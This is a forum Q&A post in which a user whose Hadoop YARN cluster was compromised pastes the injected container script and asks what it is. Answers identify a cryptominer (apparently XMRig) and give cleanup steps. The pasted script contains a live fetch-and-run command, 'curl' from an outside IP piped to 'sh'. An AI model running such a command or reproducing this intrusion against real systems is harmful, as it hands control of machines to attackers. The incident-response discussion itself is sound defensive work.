# It's seem that the yarn is infected by Trojan, even if I reinstall my computer?

Tags: hadoop-yarn, trojan

Every time when I start my yarn, I will find a task request which can't be finished, but I can't get any log about it and I didn't find any error.
And I found a file in temp directory named launch_container.sh, as below:

```
enter code here#!/bin/bash


export NM_HTTP_PORT="8042"

export LOCAL_DIRS="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001"

export HADOOP_COMMON_HOME="/root/hadoop-2.8.3"

export JAVA_HOME="/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.el7_5.x86_64/jre"

export NM_AUX_SERVICE_mapreduce_shuffle="AAA0+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

"

export HADOOP_YARN_HOME="/root/hadoop-2.8.3"

export HADOOP_TOKEN_FILE_LOCATION="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001/container_tokens"

export NM_HOST="VM_0_11_centos"

export APPLICATION_WEB_PROXY_BASE="/proxy/application_1527211944644_0001"

export JVM_PID="$$"

export USER="dr.who"

export HADOOP_HDFS_HOME="/root/hadoop-2.8.3"

export PWD="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001"

export CONTAINER_ID="container_1527211944644_0001_02_000001"

export HOME="/home/"

export NM_PORT="44381"

export LOGNAME="dr.who"

export APP_SUBMIT_TIME_ENV="1527212057989"

export MAX_APP_ATTEMPTS="2"

export HADOOP_CONF_DIR="/root/hadoop-2.8.3/etc/hadoop"

export MALLOC_ARENA_MAX="4"

export LOG_DIRS="/root/hadoop-2.8.3/logs/userlogs/application_1527211944644_0001/container_1527211944644_0001_02_000001"

exec /bin/bash -c "curl 185.222.210.59/x_wcr.sh | sh"

hadoop_shell_errorcode=$?

if [ $hadoop_shell_errorcode -ne 0 ]

then

  exit $hadoop_shell_errorcode

fi
```

I found it'll download something from a website, and I have reinstalled my computer from ubuntu to centos, and this problem still existed though I can't find same problem in other computers. This problem is whether a normal thing or a trojan? 
Please give some hints about how to fixed this problem, thanks.
It's as same as this site "http://ist-deacuna-s1.syr.edu:8088/cluster/apps"

This situation is generatered after I close the port of wget, and when I open port of wget, it will add session which can't be seen by jps, just be observered by commmand

```
ps -ef|grep java
ubuntu    7484     1 97 07:16 ?        00:01:58 /var/tmp/java -c /var/tmp/w.conf
ubuntu    7496     1 96 07:16 ?        00:01:57 /var/tmp/java -c /var/tmp/w.conf
```

These two session always hold all my cpu.

Comment: What happens if you rename `launch_container.sh` to something else, and move it to another directory?

Comment: It influence nothing because it was generated in temp directory according to the PID.

Answer (score 3):

this is a hack...  They put a miner on your machine.  I had the same thing and here is how to get rid of it.  They created a cron job to execute a remote sh file to "install" it if you remove it.  That must be deleted first.  I found mine in

```
/var/spool/cron
```

Then you can delete the entire /var/tmp/ directory.  Then kill the offending pids.  Find them with

```
ps -Af | grep /tmp/
```

I am trying to figure out how they were able to access our machine to install this.

Comment: This link provides some info too.  https://community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html?page=2&pageSize=10&sort=oldest

Answer (score 0):

Can you check the file /var/tmp/java with --version. Had the same problem. Suggestion you will find XMRig